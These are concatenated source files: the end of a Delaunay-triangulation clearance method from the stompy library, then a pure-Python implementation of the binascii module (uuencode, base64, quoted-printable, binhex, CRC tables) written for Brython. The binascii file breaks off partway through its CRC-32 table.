        Return the distance from point x=[p_x,p_y] to the nearest
        node or constrained segment of the triangulation.

        hint: To speed up consecutive queries with spatial locality, pass
        a dictionary, and a new dictionary will be returned as the second
        item in a tuple. The initial dictionary can be empty, or 'c':int
        to give a starting face of the triangulation.
        """
        if hint is not None:
            loc_face,loc_type,loc_index=self.locate(x,**hint)
        else:
            loc_face,loc_type,loc_index=self.locate(x)
        assert loc_type in (self.IN_VERTEX, self.IN_EDGE, self.IN_FACE)
        # nearest node distance, among the containing face's vertices
        face_nodes=self.cells['nodes'][loc_face]
        min_clearance=dist( self.nodes['x'][face_nodes], x ).min()
        # also consider constrained edges of the containing face
        for j in self.cell_to_edges(loc_face):
            if self.edges['constrained'][j]:
                j_clearance=point_segment_distance(x, self.nodes['x'][self.edges['nodes'][j]] )
                min_clearance=min(min_clearance,j_clearance)
        if hint is not None:
            # return the located face so the next query can start nearby
            return min_clearance,{'c':loc_face}
        else:
            return min_clearance
# Issues:
# Calls like edge_to_cells do not scale well right now. In particular,
# it would be better in this code to always specify the edge, so that
# a full scan isn't necessary.
| {
"repo_name": "rustychris/stompy",
"path": "stompy/grid/exact_delaunay.py",
"copies": "1",
"size": "84123",
"license": "mit",
"hash": 3253068275557715000,
"line_mean": 38.9444444444,
"line_max": 111,
"alpha_frac": 0.4823769956,
"autogenerated": false,
"ratio": 4.084632192279679,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9970817428234852,
"avg_score": 0.019238351928965385,
"num_lines": 2106
} |
"""A pure Python implementation of binascii.
Rather slow and buggy in corner cases.
PyPy provides an RPython version too.
"""
# borrowed from https://bitbucket.org/pypy/pypy/src/f2bf94943a41/lib_pypy/binascii.py
class Error(ValueError):
    """Raised by the conversion routines on malformed input."""

    def __init__(self, msg=''):
        self._msg = msg

    def __str__(self):
        # reproduce the historical message format, leading space included
        return " binascii.Error: %s" % self._msg
class Done(Exception):
    # Internal control-flow exception: raised by a2b_hqx's generator when
    # the ':' terminator (DONE code) is seen in the input.
    pass
class Incomplete(Error):
    # Defined for API compatibility with CPython's binascii; not raised by
    # the code visible in this module.
    pass
def a2b_uu(s):
    """Decode one line of uuencoded data (str input) to bytes.

    The first character encodes the payload length; the remainder is
    decoded in groups of four characters to three output bytes.
    Raises Error on characters outside the uuencode range or on non-NUL
    trailing data.
    """
    if not s:
        return ''
    # the leading character carries the decoded byte count (mod 64)
    length = (ord(s[0]) - 0x20) % 64
    def quadruplets_gen(s):
        # yield the input four characters at a time, space-padding a
        # short final group
        while s:
            try:
                yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
            except IndexError:
                s += '   '
                yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
                return
            s = s[4:]
    try:
        # each character contributes 6 bits; recombine into 3 bytes
        result = [''.join(
                    [chr((A - 0x20) << 2 | (((B - 0x20) >> 4) & 0x3)),
                     chr(((B - 0x20) & 0xf) << 4 | (((C - 0x20) >> 2) & 0xf)),
                     chr(((C - 0x20) & 0x3) << 6 | ((D - 0x20) & 0x3f))
                    ]) for A, B, C, D in quadruplets_gen(s[1:].rstrip())]
    except ValueError:
        raise Error('Illegal char')
    result = ''.join(result)
    trailingdata = result[length:]
    if trailingdata.strip('\x00'):
        raise Error('Trailing garbage')
    result = result[:length]
    # pad a short result out to the declared length with NULs
    if len(result) < length:
        result += ((length - len(result)) * '\x00')
    # __BRYTHON__.charset is a Brython runtime global -- presumably the
    # page charset; not defined in this file
    return bytes(result, __BRYTHON__.charset)
def b2a_uu(s):
    """Uuencode a single line of at most 45 characters.

    The result is a length character, the 4-for-3 expanded payload, and a
    trailing newline.  Raises Error when the input exceeds 45 characters.
    """
    length = len(s)
    if length > 45:
        raise Error('At most 45 bytes at once')

    def triples(data):
        # walk the input three characters at a time, NUL-padding the tail
        idx = 0
        while idx < len(data):
            chunk = data[idx:idx + 3] + '\0\0'
            yield ord(chunk[0]), ord(chunk[1]), ord(chunk[2])
            idx += 3

    pieces = []
    for a, b, c in triples(s):
        # split 3 bytes into four 6-bit groups, biased into the printable range
        pieces.append(chr(0x20 + ((a >> 2) & 0x3F)))
        pieces.append(chr(0x20 + (((a << 4) | ((b >> 4) & 0xF)) & 0x3F)))
        pieces.append(chr(0x20 + (((b << 2) | ((c >> 6) & 0x3)) & 0x3F)))
        pieces.append(chr(0x20 + (c & 0x3F)))
    return chr(ord(' ') + (length & 0o77)) + ''.join(pieces) + '\n'
# Base64 decoding table: maps each alphabet character to its 6-bit value.
# '=' maps to 0 so padding folds harmlessly into the bit accumulator.
table_a2b_base64 = {
    'A': 0,
    'B': 1,
    'C': 2,
    'D': 3,
    'E': 4,
    'F': 5,
    'G': 6,
    'H': 7,
    'I': 8,
    'J': 9,
    'K': 10,
    'L': 11,
    'M': 12,
    'N': 13,
    'O': 14,
    'P': 15,
    'Q': 16,
    'R': 17,
    'S': 18,
    'T': 19,
    'U': 20,
    'V': 21,
    'W': 22,
    'X': 23,
    'Y': 24,
    'Z': 25,
    'a': 26,
    'b': 27,
    'c': 28,
    'd': 29,
    'e': 30,
    'f': 31,
    'g': 32,
    'h': 33,
    'i': 34,
    'j': 35,
    'k': 36,
    'l': 37,
    'm': 38,
    'n': 39,
    'o': 40,
    'p': 41,
    'q': 42,
    'r': 43,
    's': 44,
    't': 45,
    'u': 46,
    'v': 47,
    'w': 48,
    'x': 49,
    'y': 50,
    'z': 51,
    '0': 52,
    '1': 53,
    '2': 54,
    '3': 55,
    '4': 56,
    '5': 57,
    '6': 58,
    '7': 59,
    '8': 60,
    '9': 61,
    '+': 62,
    '/': 63,
    '=': 0,
}
def a2b_base64(s):
    """Decode base64 data (str, bytes or bytearray) to bytes.

    Invalid characters are skipped; '=' padding terminates decoding once
    at least two characters of the final quad have been seen.  Raises
    Error('Incorrect padding') when the bit stream ends mid-byte.
    """
    if not isinstance(s, (str, bytes, bytearray)):
        raise TypeError("expected string, bytes or a bytearray, got %r" % (s,))
    s = s.rstrip()
    # clean out all invalid characters, this also strips the final '=' padding
    # check for correct padding
    def next_valid_char(s, pos):
        # return the next alphabet character after pos (as a str), or None;
        # used to validate the position of '=' padding
        for i in range(pos + 1, len(s)):
            c = s[i]
            # bug fix: normalize before comparing -- indexing a str yields a
            # str, and comparing str with the int 0x7f raises TypeError
            if isinstance(c, int):
                c = chr(c)
            if c < '\x7f' and c in table_a2b_base64:
                return c
        return None
    quad_pos = 0
    leftbits = 0
    leftchar = 0
    res = []
    for i, c in enumerate(s):
        if isinstance(c, int):
            # iterating bytes/bytearray yields ints; normalize to str
            c = chr(c)
        if c > '\x7f' or c == '\n' or c == '\r' or c == ' ':
            continue
        if c == '=':
            # '=' only counts as padding after at least two data characters
            # of the current quad
            if quad_pos < 2 or (quad_pos == 2 and next_valid_char(s, i) != '='):
                continue
            else:
                leftbits = 0
                break
        try:
            next_c = table_a2b_base64[c]
        except KeyError:
            continue
        # accumulate 6 bits per character, emitting whole bytes
        quad_pos = (quad_pos + 1) & 0x03
        leftchar = (leftchar << 6) | next_c
        leftbits += 6
        if leftbits >= 8:
            leftbits -= 8
            res.append((leftchar >> leftbits & 0xff))
            leftchar &= ((1 << leftbits) - 1)
    if leftbits != 0:
        raise Error('Incorrect padding')
    # __BRYTHON__.charset is a Brython runtime global -- TODO confirm it
    # round-trips bytes > 0x7f for the configured charset
    return bytes(''.join([chr(i) for i in res]), __BRYTHON__.charset)
# Base64 encoding table: the 64-character alphabet, indexed by 6-bit value.
table_b2a_base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"\
                   "0123456789+/"
def b2a_base64(s):
    """Encode s to base64 and return bytes ending with a newline.

    Indexes of s are used as integers directly, so s is expected to be
    bytes/bytearray (note the b'\\0\\0' padding below).
    """
    length = len(s)
    # number of bytes in the final, partial group (0, 1 or 2)
    final_length = length % 3
    def triples_gen(s):
        # yield the input three bytes at a time, NUL-padding a short tail
        while s:
            try:
                yield s[0], s[1], s[2]
            except IndexError:
                s += b'\0\0'
                yield s[0], s[1], s[2]
                return
            s = s[3:]
    # encode only the whole 3-byte groups here; the tail is handled below
    # with explicit '=' padding
    a = triples_gen(s[ :length - final_length])
    result = [''.join(
                [table_b2a_base64[( A >> 2 ) & 0x3F],
                 table_b2a_base64[((A << 4) | ((B >> 4) & 0xF)) & 0x3F],
                 table_b2a_base64[((B << 2) | ((C >> 6) & 0x3)) & 0x3F],
                 table_b2a_base64[( C ) & 0x3F]])
              for A, B, C in a]
    final = s[length - final_length:]
    if final_length == 0:
        snippet = ''
    elif final_length == 1:
        # one leftover byte -> two characters + '=='
        a = final[0]
        snippet = table_b2a_base64[(a >> 2 ) & 0x3F] + \
                  table_b2a_base64[(a << 4 ) & 0x3F] + '=='
    else:
        # two leftover bytes -> three characters + '='
        a = final[0]
        b = final[1]
        snippet = table_b2a_base64[(a >> 2) & 0x3F] + \
                  table_b2a_base64[((a << 4) | (b >> 4) & 0xF) & 0x3F] + \
                  table_b2a_base64[(b << 2) & 0x3F] + '='
    # __BRYTHON__.charset is a Brython runtime global; not defined here
    return bytes(''.join(result) + snippet + '\n', __BRYTHON__.charset)
def a2b_qp(s, header=False):
    """Decode a quoted-printable string to bytes.

    header=True additionally maps '_' to a space (RFC 2047 encoded-word
    style).  Malformed '=' escapes are passed through literally.
    """
    inp = 0
    odata = []
    while inp < len(s):
        if s[inp] == '=':
            inp += 1
            if inp >= len(s):
                # trailing lone '=' is dropped
                break
            # Soft line breaks
            if (s[inp] == '\n') or (s[inp] == '\r'):
                if s[inp] != '\n':
                    # skip '\r' (and anything else) up to the '\n'
                    while inp < len(s) and s[inp] != '\n':
                        inp += 1
                if inp < len(s):
                    inp += 1
            elif s[inp] == '=':
                # broken case from broken python qp
                odata.append('=')
                inp += 1
            elif (inp + 1 < len(s) and
                  s[inp] in hex_numbers and s[inp + 1] in hex_numbers):
                # bug fix: the bounds check guards against an IndexError when
                # the input ends with '=' plus a single hex digit
                ch = chr(int(s[inp:inp+2], 16))
                inp += 2
                odata.append(ch)
            else:
                # not a valid escape: emit the '=' literally (the following
                # character is handled on the next loop iteration)
                odata.append('=')
        elif header and s[inp] == '_':
            odata.append(' ')
            inp += 1
        else:
            odata.append(s[inp])
            inp += 1
    # __BRYTHON__.charset is a Brython runtime global; not defined here
    return bytes(''.join(odata), __BRYTHON__.charset)
def b2a_qp(data, quotetabs=False, istext=True, header=False):
    """quotetabs=True means that tab and space characters are always
    quoted.
    istext=False means that \r and \n are treated as regular characters
    header=True encodes space characters with '_' and requires
    real '_' characters to be quoted.
    """
    MAXLINESIZE = 76
    # See if this string is using CRLF line ends
    lf = data.find('\n')
    crlf = lf > 0 and data[lf-1] == '\r'
    inp = 0
    linelen = 0
    odata = []
    while inp < len(data):
        c = data[inp]
        # characters that must be hex-escaped: non-printables, '=', '_' in
        # header mode, a lone '.' at line start, bare CR/LF in binary mode,
        # and trailing/forced-quoted whitespace
        if (c > '~' or
            c == '=' or
            (header and c == '_') or
            (c == '.' and linelen == 0 and (inp+1 == len(data) or
                                            data[inp+1] == '\n' or
                                            data[inp+1] == '\r')) or
            (not istext and (c == '\r' or c == '\n')) or
            ((c == '\t' or c == ' ') and (inp + 1 == len(data))) or
            (c <= ' ' and c != '\r' and c != '\n' and
             (quotetabs or (not quotetabs and (c != '\t' and c != ' '))))):
            linelen += 3
            if linelen >= MAXLINESIZE:
                # emit a soft line break before overflowing the line limit
                odata.append('=')
                if crlf: odata.append('\r')
                odata.append('\n')
                linelen = 3
            odata.append('=' + two_hex_digits(ord(c)))
            inp += 1
        else:
            if (istext and
                (c == '\n' or (inp+1 < len(data) and c == '\r' and
                               data[inp+1] == '\n'))):
                linelen = 0
                # Protect against whitespace on end of line
                if (len(odata) > 0 and
                    (odata[-1] == ' ' or odata[-1] == '\t')):
                    # retroactively hex-escape the trailing blank
                    ch = ord(odata[-1])
                    odata[-1] = '='
                    odata.append(two_hex_digits(ch))
                if crlf: odata.append('\r')
                odata.append('\n')
                if c == '\r':
                    inp += 2
                else:
                    inp += 1
            else:
                if (inp + 1 < len(data) and
                    data[inp+1] != '\n' and
                    (linelen + 1) >= MAXLINESIZE):
                    # soft line break before a literal character would
                    # overflow the line
                    odata.append('=')
                    if crlf: odata.append('\r')
                    odata.append('\n')
                    linelen = 0
                linelen += 1
                if header and c == ' ':
                    c = '_'
                odata.append(c)
                inp += 1
    return ''.join(odata)
# Upper-case hexadecimal digits, indexed by nibble value.
hex_numbers = '0123456789ABCDEF'
def hex(n):
    """Return the hexadecimal representation of integer n (upper-case
    digits, no '0x' prefix, leading '-' for negatives).

    Shadows the builtin hex(); kept for interface compatibility.
    """
    if n == 0:
        return '0'
    if n < 0:
        n = -n
        sign = '-'
    else:
        sign = ''
    arr = []
    def hex_gen(n):
        """ Yield a nibble at a time. """
        while n:
            yield n % 0x10
            # bug fix: floor division -- '/' yields a float under Python 3,
            # so 'while n' would never terminate
            n = n // 0x10
    for nibble in hex_gen(n):
        arr = [hex_numbers[nibble]] + arr
    return sign + ''.join(arr)
def two_hex_digits(n):
    """Return the two-digit upper-case hex representation of 0 <= n < 256."""
    # bug fix: '//' -- '/' produces a float, which is an invalid str index
    # under Python 3
    return hex_numbers[n // 0x10] + hex_numbers[n % 0x10]
def strhex_to_int(s):
    """Parse an upper-case hexadecimal string into an integer."""
    i = 0
    for c in s:
        i = i * 0x10 + hex_numbers.index(c)
    return i
# The 64-character binhex4 alphabet, indexed by 6-bit value.
hqx_encoding = '!"#$%&\'()*+,-012345689@ABCDEFGHIJKLMNPQRSTUVXYZ[`abcdefhijklmpqr'
# Sentinel codes used by table_a2b_hqx below:
DONE = 0x7f   # the ':' terminator
SKIP = 0x7e   # whitespace (\n, \r) to ignore
FAIL = 0x7d   # any character outside the alphabet
# binhex4 decoding table, indexed by character ordinal (0-255): 6-bit value
# for alphabet characters, or one of the DONE/SKIP/FAIL sentinels.
table_a2b_hqx = [
    #^@ ^A ^B ^C ^D ^E ^F ^G
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    #\b \t \n ^K ^L \r ^N ^O
    FAIL, FAIL, SKIP, FAIL, FAIL, SKIP, FAIL, FAIL,
    #^P ^Q ^R ^S ^T ^U ^V ^W
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    #^X ^Y ^Z ^[ ^\ ^] ^^ ^_
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    # ! " # $ % & '
    FAIL, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,
    #( ) * + , - . /
    0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, FAIL, FAIL,
    #0 1 2 3 4 5 6 7
    0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, FAIL,
    #8 9 : ; < = > ?
    0x14, 0x15, DONE, FAIL, FAIL, FAIL, FAIL, FAIL,
    #@ A B C D E F G
    0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D,
    #H I J K L M N O
    0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, FAIL,
    #P Q R S T U V W
    0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, FAIL,
    #X Y Z [ \ ] ^ _
    0x2C, 0x2D, 0x2E, 0x2F, FAIL, FAIL, FAIL, FAIL,
    #` a b c d e f g
    0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, FAIL,
    #h i j k l m n o
    0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, FAIL, FAIL,
    #p q r s t u v w
    0x3D, 0x3E, 0x3F, FAIL, FAIL, FAIL, FAIL, FAIL,
    #x y z { | } ~ ^?
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
    ]
def a2b_hqx(s):
    """Decode binhex4-encoded data.

    Returns (decoded_string, done) where done is 1 when the ':' terminator
    was seen.  Raises Error on characters outside the binhex alphabet.
    """
    result = []
    def quadruples_gen(s):
        # yield 6-bit values four at a time; Done signals the ':' terminator
        t = []
        for c in s:
            res = table_a2b_hqx[ord(c)]
            if res == SKIP:
                continue
            elif res == FAIL:
                raise Error('Illegal character')
            elif res == DONE:
                yield t
                raise Done
            else:
                t.append(res)
            if len(t) == 4:
                yield t
                t = []
        yield t
    done = 0
    try:
        # recombine four 6-bit values into three bytes; shorter final
        # groups yield proportionally fewer bytes
        for snippet in quadruples_gen(s):
            length = len(snippet)
            if length == 4:
                result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
                result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
                result.append(chr(((snippet[2] & 0x03) << 6) | (snippet[3])))
            elif length == 3:
                result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
                result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
            elif length == 2:
                result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
    except Done:
        done = 1
    except Error:
        # re-raised unchanged; kept for explicitness
        raise
    return (''.join(result), done)
# should this return a bytes object?
#return (bytes(''.join(result), __BRYTHON__.charset), done)
def b2a_hqx(s):
    """Encode a string with binhex4 (no run-length encoding, no ':'
    delimiters -- just the 3-to-4 character expansion)."""
    result =[]
    def triples_gen(s):
        # yield character ordinals three at a time; the final group may be
        # shorter (1 or 2 values)
        while s:
            try:
                yield ord(s[0]), ord(s[1]), ord(s[2])
            except IndexError:
                yield tuple([ord(c) for c in s])
            s = s[3:]
    for snippet in triples_gen(s):
        length = len(snippet)
        # split 3 bytes into four 6-bit alphabet indices; short final
        # groups emit fewer characters
        if length == 3:
            result.append(
                hqx_encoding[(snippet[0] & 0xfc) >> 2])
            result.append(hqx_encoding[
                ((snippet[0] & 0x03) << 4) | ((snippet[1] & 0xf0) >> 4)])
            result.append(hqx_encoding[
                (snippet[1] & 0x0f) << 2 | ((snippet[2] & 0xc0) >> 6)])
            result.append(hqx_encoding[snippet[2] & 0x3f])
        elif length == 2:
            result.append(
                hqx_encoding[(snippet[0] & 0xfc) >> 2])
            result.append(hqx_encoding[
                ((snippet[0] & 0x03) << 4) | ((snippet[1] & 0xf0) >> 4)])
            result.append(hqx_encoding[
                (snippet[1] & 0x0f) << 2])
        elif length == 1:
            result.append(
                hqx_encoding[(snippet[0] & 0xfc) >> 2])
            result.append(hqx_encoding[
                ((snippet[0] & 0x03) << 4)])
    return ''.join(result)
# Lookup table for the 16-bit binhex CRC (polynomial 0x1021), indexed by
# one byte; used by crc_hqx().
crctab_hqx = [
        0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
        0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
        0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
        0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
        0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
        0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
        0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
        0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
        0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
        0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
        0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
        0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
        0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
        0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
        0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
        0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
        0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
        0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
        0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
        0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
        0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
        0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
        0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
        0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
        0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
        0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
        0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
        0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
        0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
        0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
        0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
        0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,
]
def crc_hqx(s, crc):
    """Advance the 16-bit binhex CRC over string s, starting from crc."""
    for c in s:
        # table-driven update one byte at a time; the mask keeps the
        # running value within 16 bits
        crc = ((crc << 8) & 0xff00) ^ crctab_hqx[((crc >> 8) & 0xff) ^ ord(c)]
    return crc
def rlecode_hqx(s):
    """Run-length encode a string for binhex4.

    A run of four or more identical characters becomes char + '\\x90' +
    count (count capped at 255); the escape character '\\x90' itself is
    always written as '\\x90\\x00'.  Unlike CPython, runs of '\\x90' are
    also run-length encoded.
    """
    if not s:
        return ''
    out = []

    def emit(ch, count):
        # flush one completed run, escaping '\x90' as needed
        if count == 1:
            if ch != '\x90':
                out.append(ch)
            else:
                out.extend(['\x90', '\x00'])
        elif count < 4:
            if ch != '\x90':
                out.extend([ch] * count)
            else:
                out.extend(['\x90', '\x00'] * count)
        else:
            if ch != '\x90':
                out.extend([ch, '\x90', chr(count)])
            else:
                out.extend(['\x90', '\x00', '\x90', chr(count)])

    prev = s[0]
    count = 1
    # Append a sentinel different from the last character so the loop
    # flushes the final run; drop s[0], which is already held in prev.
    sentinel = '?' if s[-1] == '!' else '!'
    for ch in s[1:] + sentinel:
        if ch == prev and count < 255:
            count += 1
        else:
            emit(prev, count)
            count = 1
            prev = ch
    return ''.join(out)
def rledecode_hqx(s):
    """Decode binhex4 run-length encoding (inverse of rlecode_hqx)."""
    chunks = s.split('\x90')
    out = [chunks[0]]
    prev = chunks[0]
    for chunk in chunks[1:]:
        repeat = ord(chunk[0])
        if repeat == 0:
            # '\x90' followed by '\x00' is a literal escape character
            out.append('\x90')
            prev = '\x90'
        else:
            # '\x90' + n: the preceding character repeats n times in total
            out.append(prev[-1] * (repeat - 1))
            prev = chunk
        out.append(chunk[1:])
    return ''.join(out)
# Standard CRC-32 lookup table, indexed by one byte; used by crc32().
crc_32_tab = [
    0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
    0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
    0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
    0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
    0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
    0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
    0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
    0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
    0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
    0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
    0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
    0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
    0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
    0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
    0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
    0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
    0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
    0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
    0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
    0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
    0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
    0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
    0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
    0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
    0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
    0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
    0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
    0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
    0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
    0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
    0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
    0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
    0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
    0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
    0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
    0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
    0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
    0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
    0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
    0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
    0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
    0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
    0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
    0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
